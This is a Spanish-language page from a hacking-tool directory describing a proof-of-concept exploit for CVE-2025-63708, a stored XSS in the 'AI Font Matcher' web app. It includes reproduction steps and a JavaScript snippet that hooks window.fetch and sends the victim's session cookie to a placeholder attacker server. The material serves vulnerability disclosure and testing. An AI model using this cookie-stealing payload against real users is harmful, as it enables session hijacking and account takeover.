Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-63708 — Prueba de concepto de exploit para CVE-2025-63708, una vulnerabilidad de XSS almacenado en AI Font Matcher. Demuestra el robo de cookies de sesión mediante nombres de familias de fuentes sin sanitizar en las respuestas de obtención de webfonts. | Kitploit
Herramientas/GitHubGitHub/dylandavis1/cve-2025-63708
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubdylandavis1/cve-2025-63708

CVE-2025-63708

Prueba de concepto de exploit para CVE-2025-63708, una vulnerabilidad de XSS almacenado en AI Font Matcher. Demuestra el robo de cookies de sesión mediante nombres de familias de fuentes sin sanitizar en las respuestas de obtención de webfonts.

Ver Repositorio
2hace 9 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-63708

ID de CVE: CVE-2025-63708
Asignado: 11-12-2025 Tipo de problema: CWE-79 (Cross-Site Scripting)
Producto afectado: "AI Font Matcher" (publicado el 2025-10-10, nid=18425)
Página del producto: https://www.sourcecodester.com/javascript/18425/ai-font-matcher-using-html-css-and-javascript-source-code.html
Fecha de descubrimiento: 2025-10-11
Investigador: Dylan Davis

Resumen

La aplicación procesa datos de una solicitud webfonts sin sanitizar los nombres de las familias de fuentes. Un atacante que controle o intercepte esa respuesta puede inyectar JavaScript que se ejecute en el contexto de la página, lo que permite el robo de cookies de sesión y la toma de control de la cuenta.

Impacto

  • Ejecución arbitraria de JavaScript en el navegador de la víctima
  • Exfiltración de cookies de sesión (observé cookies no HttpOnly durante mis pruebas)
  • Secuestro de cuenta y acciones realizadas en nombre del usuario

Versiones afectadas / Alcance

  • El paquete "AI Font Matcher" distribuido en SourceCodester a fecha del 2025-10-10.

Reproducción (PoC)

Este PoC demuestra la ejecución de código interceptando window.fetch y devolviendo un payload controlado de Web Fonts.

  1. Ejecute la aplicación localmente desde el código fuente descargado.
  2. Abra DevTools → Consola y pegue el PoC siguiente (o cargue poc.js).
  3. Active la interfaz que solicita webfonts; observe un alert(1).
root@kitploit:~
window.__origFetch = window.fetch;
window.fetch = async function(input, init) {
    const url = (typeof input === 'string') ? input : input?.url;
    if (url && url.includes('webfonts')) {
        // Exfiltrate cookie to your server
        fetch('http://[your-ip]:8001/steal?cookie=' + 
              encodeURIComponent(document.cookie))
            .catch(e => console.log('Exfil failed:', e));
        
        return new Response(JSON.stringify({
            kind: "webfonts#webfontList",
            items: [{ family: "Playfair Display", category: "serif" }]
        }), {
            status: 200, 
            headers: {'Content-Type': 'application/json'}
        });
    }
    return window.__origFetch.apply(this, arguments);
};
Descargar herramienta